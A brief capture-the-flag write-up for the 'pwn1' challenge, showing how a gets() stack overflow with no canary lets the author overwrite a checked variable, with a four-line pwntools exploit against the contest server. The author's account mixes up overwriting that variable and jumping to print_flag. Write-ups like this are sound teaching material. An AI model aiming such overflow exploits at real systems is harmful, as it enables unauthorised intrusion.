pwn1 asks the user to enter a passphrase.

This is a super secret program
Noone is allowed through except for those who know the secret!
What is my secret?

WHAT_DO_I_KNOW?

That is not the secret word!

So, I assume there will be some check somewhere.

I checked the results of strings command to see if there is a password hardcoded into the program.

Nope, but nice try.

It’s time for giving radare2 a chance. Let’s analyse…

The input is useless because is stored in eax… but the check with the password (which is \xf0\x07\xba\x11) is performed with a local variable set to 0.

So, how can I pwn it?

Easy peasy! there is a gets without length check: this means that I can write portions of the stack and do whatever I want with this program.

Even better, there is no canary!

I can write the password in the correct memory cell. The exploit is some glibberish and than the address of the print_flag function.

BE CAREFUL: I assumed ASLR was disabled on server. So I opened a shell with ASLR disabled, got the address of print_flag and appended to the exploit string. My assumption was correct! There is no ASLR on server side.

I used pwntools for crafting and simplicity. This is the script:

from pwn import *
exc = remote('pwn.ctf.tamu.edu',4321)
exc.sendline('A'*23 + p32(0xf007ba11))
exc.interactive()

23 is the lenght of the input string buffer in stack (found with radare2).

Flag captured ;-)